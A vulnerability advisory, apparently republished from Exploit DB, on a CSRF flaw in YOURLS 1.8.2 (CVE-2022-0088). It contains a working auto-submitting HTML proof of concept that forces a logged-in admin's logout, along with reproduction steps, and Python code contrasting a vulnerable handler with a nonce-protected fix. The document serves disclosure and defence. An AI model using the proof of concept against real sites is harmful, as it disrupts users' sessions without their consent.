YOURLS 1.8.2 CSRF Flaw Allows Forced User Logout

Version 1.8.2 of YOURLS has a security flaw that exposes authenticated users to a CSRF attack. An attacker could log an authenticated user out without their knowledge or consent.

Although on the surface this would seem to affect only users in this scenario, it also shows that there is no CSRF protection on sensitive administrative operations.

Vulnerability Information:
1. Product: YOURLS
2. Version: 1.8.2
3. Vulnerability Type: CSRF (Cross-Site Request Forgery)
4. CVE ID: CVE-2022-0088
5. Environment Tested: Windows
6. Reported By: CodeSecLab

The vulnerable endpoint accepts state-changing requests without requiring either a CSRF token or any proof of intent from the user. As such, an external site can cause a logged-in user's browser to send the request, and the server executes it, with unintended consequences for the user.

What’s the Risk?
If a logged-in YOURLS administrator visits a malicious or compromised webpage, that page can automatically send a request to the YOURLS admin panel. In this case, the request forces the user to log out immediately.

Although this specific proof of concept demonstrates a logout action, similar weaknesses can often be extended to more impactful actions if other endpoints are exposed in the same way.

Proof of Concept
When opened by an authenticated YOURLS user, the browser silently sends the request, logging the user out without any interaction.
The CSRF PoC below demonstrates this by submitting an automatic logout request from an HTML file.

CSRF PoC HTML File:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF PoC</title>
</head>
<body>
    <form action="http://yourls/admin/index.php" method="GET">
        <input type="hidden" name="action" value="logout">
    </form>
    <script>
        document.forms[0].submit();
    </script>
</body>
</html>

As soon as the authenticated user opens this file in their browser, it sends the logout request to the server and ends the user's session without any user action required.

To replicate this issue:
1. Create a file "poc.html" with the code above
2. Log in to your YOURLS website
3. Navigate to "poc.html" in the same browser session you created in [step 2]
4. Note that you have been automatically logged out of your YOURLS account

Importance of This Issue:
CSRF vulnerabilities are often overlooked by developers, as they may not produce immediate indicators (unlike a compromised system). However, as a security vulnerability, CSRF fundamentally breaks the security model's assumption that each action taken on a sensitive object (such as a blog or website) was performed intentionally by the user.

A user could be exposed to a wide range of attacks that stem from being logged out without their consent. Examples include disruption of a user's session (e.g., as a form of DoS), social engineering such as phishing on the resulting login prompt, and multi-layered attacks that combine several methods concurrently.

Recommendations to Developers:
In light of this vulnerability, developers should strongly consider implementing CSRF tokens, limiting sensitive actions to POST requests only, and validating all user input that is deemed sensitive. Users running an affected version of YOURLS should refer to the YOURLS project documentation for remediation.
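To make the recommendation concrete, the following is an added example (not YOURLS code) written in Python: a model of the 1.8.2-style logout handler, which honours any GET carrying action=logout, beside a hardened handler that requires POST plus a session-bound HMAC token. The request model, session store, secret and the nonce helpers are all constructed for this illustration.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass

# Server-side secret for deriving tokens; a real deployment loads this from config.
SERVER_SECRET = secrets.token_bytes(32)


@dataclass
class Request:
    """Minimal model of an incoming HTTP request (constructed for this example)."""
    method: str
    params: dict
    session_id: str = ""  # value of the session cookie, empty if none was sent


def create_nonce(session_id: str, action: str) -> str:
    """Bind a token to one session and one action so it cannot be reused elsewhere."""
    msg = f"{session_id}:{action}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()


def verify_nonce(token: str, session_id: str, action: str) -> bool:
    # Constant-time comparison avoids leaking the token byte by byte.
    return hmac.compare_digest(token, create_nonce(session_id, action))


def logout_vulnerable(req: Request, sessions: dict) -> bool:
    """Mirrors the reported behaviour: any request with action=logout ends the session.
    A cross-site page only needs the browser to attach the session cookie."""
    if req.session_id in sessions and req.params.get("action") == "logout":
        del sessions[req.session_id]
        return True
    return False


def logout_hardened(req: Request, sessions: dict) -> bool:
    """Requires POST and a nonce tied to the caller's session. A cross-site form can
    still POST, but it cannot read the victim's nonce, so the check fails."""
    if req.session_id not in sessions or req.params.get("action") != "logout":
        return False
    if req.method != "POST":
        return False
    if not verify_nonce(req.params.get("nonce", ""), req.session_id, "logout"):
        return False
    del sessions[req.session_id]
    return True
```

The legitimate logout form must embed the nonce returned by create_nonce for the current session; only same-origin pages can obtain it.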

This issue demonstrates that continuous security audits are necessary even for well-established and widely adopted open-source solutions.

Source: Exploit DB

© 2016 - 2025 Red Secure Tech Ltd. Registered in England and Wales under Company Number: 15581067